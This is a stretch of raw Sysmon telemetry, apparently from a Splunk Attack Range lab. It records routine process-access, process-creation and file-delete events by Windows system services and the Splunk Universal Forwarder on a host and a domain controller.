21:50:01.788{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638530Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:01.788{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638529Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:01.788{BFB545BB-B864-6058-0500-00000000AF01}628744C:\Windows\system32\csrss.exe{BFB545BB-B409-605B-2C5A-00000000AF01}3496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000638528Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:01.788{BFB545BB-B8FB-6058-A200-00000000AF01}36401220C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BFB545BB-B409-605B-2C5A-00000000AF01}3496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000638527Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:01.789{BFB545BB-B409-605B-2C5A-00000000AF01}3496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BFB545BB-B865-6058-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005917753Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:01.732{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917752Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:01.732{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000638557Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:02.929{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD2116BA0153DE0648602B1C8E101283,SHA256=475CD756888550D49DF49253854282A546B0025B493761A0D74083B0C23A58EE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917768Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:02.885{896A638B-FDE5-6058-4E12-00000000AE01}38405920C:\Windows\system32\conhost.exe{896A638B-B40A-605B-8569-00000000AE01}2884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917767Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:02.883{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917766Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:02.883{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917765Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:02.883{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917764Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:02.883{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917763Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:02.883{896A638B-B5C8-6058-0500-00000000AE01}396464C:\Windows\system32\csrss.exe{896A638B-B40A-605B-8569-00000000AE01}2884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917762Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:02.883{896A638B-FDE4-6058-4A12-00000000AE01}63644976C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{896A638B-B40A-605B-8569-00000000AE01}2884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005917761Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:02.873{896A638B-B40A-605B-8569-00000000AE01}2884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{896A638B-B5C8-6058-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000005917760Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:02.860{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDD10C3627017C6E900A9DD247CF9DD3,SHA256=CA76DB2BFD5519BA676E624E2E585564EA71006DCB41702EF77E7387B47B7B68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638556Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:02.851{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2D796E57F2D0427D5AEAD246505A0A90,SHA256=EB35BBDF7AA339FFC49225200C717DA61BA71CE4BB569949AB77FA4C6A707571,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000638555Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:02.601{BFB545BB-B40A-605B-2D5A-00000000AF01}32641768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638554Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:02.460{BFB545BB-B8FB-6058-A600-00000000AF01}8083700C:\Windows\system32\conhost.exe{BFB545BB-B40A-605B-2D5A-00000000AF01}3264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638553Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:02.460{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638552Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:02.460{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638551Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:02.460{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638550Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:02.460{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638549Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:02.460{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638548Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:02.460{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638547Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:02.460{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638546Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:02.460{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638545Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:02.460{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638544Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 